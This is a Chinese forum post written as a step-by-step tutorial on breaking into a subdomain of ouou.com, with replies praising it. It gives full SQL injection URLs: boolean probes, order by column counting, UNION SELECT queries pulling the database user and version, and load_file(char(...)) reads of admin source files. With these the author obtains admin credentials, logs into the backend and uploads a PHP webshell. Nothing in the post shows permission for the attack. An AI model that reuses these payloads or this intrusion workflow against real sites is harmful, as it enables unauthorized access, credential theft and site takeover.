对偶偶娱乐分站服务器的安全检测
注意:转载此篇文章请保留原作者的信息![作者]:草哲
[博客]:[url]http://www.337479.cn[/url]
[联系]:QQ 337479
各位同学大家好,我是草哲,好久没写教程了,最近一直在弄我的博客(打个广告先别走开哦),欢迎大家来我的BLOG做客!地址是[url]http://www.337479.cn[/url]!
前些日子在家无聊,去了一些视频站看看搞笑的视频啥的,听说偶偶娱乐那个站还不错,但是打开来卡的要命,视频半天也不动,郁闷!偶然间不知道点进了哪个连接,进入了一个219.238.xxx.xxx这个地址,FLASH做的还不错,呵呵!
[img]http://www.337479.cn/attachment.php?fid=6[/img]
于是到[url]http://www.myipneighbors.com/[/url]这个站点查看一下该主机绑定了哪些域名!
[img]http://www.337479.cn/attachment.php?fid=7[/img]
这服务器上有3个站点,看看第一个xx.ouou.com吧!进去一看是一个文学站点,这速度感觉还不错,可我对文学不感兴趣,因为我只有幼本(幼儿园本科)的学历!网站程序是PHP的,习惯性的点进一个连接[url]http://xx.ouou.com/booklook.php?id=28[/url]进去检测以下是否存在
注入漏洞!提交
[url]http://xx.ouou.com/booklook.php?id=28[/url] and 1=1
[url]http://xx.ouou.com/booklook.php?id=28[/url] and 1=2
返回了不同的页面,可以肯定的是存在注入漏洞!
[img]http://www.337479.cn/attachment.php?fid=8[/img]
检测一下mysql的版本,返回正常可以进行union查询!
[url]http://xx.ouou.com/booklook.php?id=28[/url] and ord(mid(version(),1,1))>51 /*
[img]http://www.337479.cn/attachment.php?fid=9[/img]
用order by检测一下数据库的字段好进行下一步的渗透!
[url]http://xx.ouou.com/booklook.php?id=28[/url] order by 5 直接爆出路径了,呵呵~!看来应该经典的LMAP组合了~!(linux+mysql+apache+php)
[img]http://www.337479.cn/attachment.php?fid=10[/img]
最后得出共25个字段http://xx. uou.com/booklook.php?id=28 order by 25
字段数知道了,下面来进一步进行渗透。。。哦,对了,我们先看看这个数据库的账户有没有写的权限,如果没有我们就无法load_file()来读取文件了!可以看页面返回的结果来判断,返回正常页面说明有写的权限,呵呵。
[url]http://xx.ouou.com/booklook.php?id=28[/url] and (select count(*) from mysql.user)>0 /*
[img]http://www.337479.cn/attachment.php?fid=11[/img]
返回正常,我们进行下一步的渗透!上面说了,字段数已经确定是25了,好了我们来构造注入语句!
[url]http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201[/url],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
返回页面如下图
[img]http://www.337479.cn/attachment.php?fid=12[/img]
检测一下具体的,数据库连接账户,数据名和数据库版本
[url]http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201[/url],2,database(),4,version(),6,7,user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
[img]http://www.337479.cn/attachment.php?fid=13[/img]
MYSQL的数据库是5.0的,这样可以很方便的注入,可以像MSSQL那样的注入(小沈阳:这是为什么呢?),我在这里就不重复了,有兴趣的可以到[url]http://www.337479.cn/read.php?40[/url]这来看!我在查询管理员账户和密码的时候废了很长时间,没有查出来,呵呵!后台我已经先找到了[url]http://xx.ouou.com/admin[/url],进去一看。。。
[img]http://www.337479.cn/attachment.php?fid=14[/img]
开始以为是本地验证的机制呢。。。因为数据库连接账户有写的权限,可以load_file()来读取本地文件!上面不是说已经把路径爆出来了吗,咱就来先爆一下后台登录的页面
/data/webroot/xx/admin/index.php
构造的语句如下,load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制!我们这里把它插入到5
[url]http://zh.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201[/url],2,3,4,load_file(char(47,100,97,116,97,47,119,101,98,114,111,111,116,47,122,104,47,97,100,109,105,110,47,105,110,100,101,120,46,112,104,112)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*
[img]http://www.337479.cn/attachment.php?fid=15[/img]
什么都没有???太不给面子了吧?不可能啊,查看源代码看看,是不是没有显示出来呢?(这是为什么呢?我都变态了哈)
[img]http://www.337479.cn/attachment.php?fid=16[/img]
看来代码确实是爆出来了,呵呵,只是没有在页面里显示,不过也没什么,无所谓的事,那我们就爆一个查看一下源代码就有喽,黑客是不可以偷懒的哦(这是为什么呢?),逐个爆,看看INC.PHP的代码,不爆不知道,一爆吓一跳,原来管理员的登录验证都是在这个文件里,怪不得表里找不到!
[img]http://www.337479.cn/attachment.php?fid=17[/img]
哦了,知道了后台的账户和密码,下面就登录它后台吧!
[img]http://www.337479.cn/attachment.php?fid=18[/img]
看了一下后台,找了一个地方传个PHP的WEBSHELL,呵呵~!
结尾:就到这了,我想我写大家应该都能看得懂吧?如果有不明白的地方欢迎来我的博客做技术交流!本人博客地址是[url]http://www.337479.cn[/url] 强烈要求把图片上传到论坛。 哦了,一会编辑。 [(:cry:)] [(:cry:)] [(:cry:)] [(:cry:)] 支持!! 哈哈,跟我入侵外国的那个 差不多!·
页:
[1]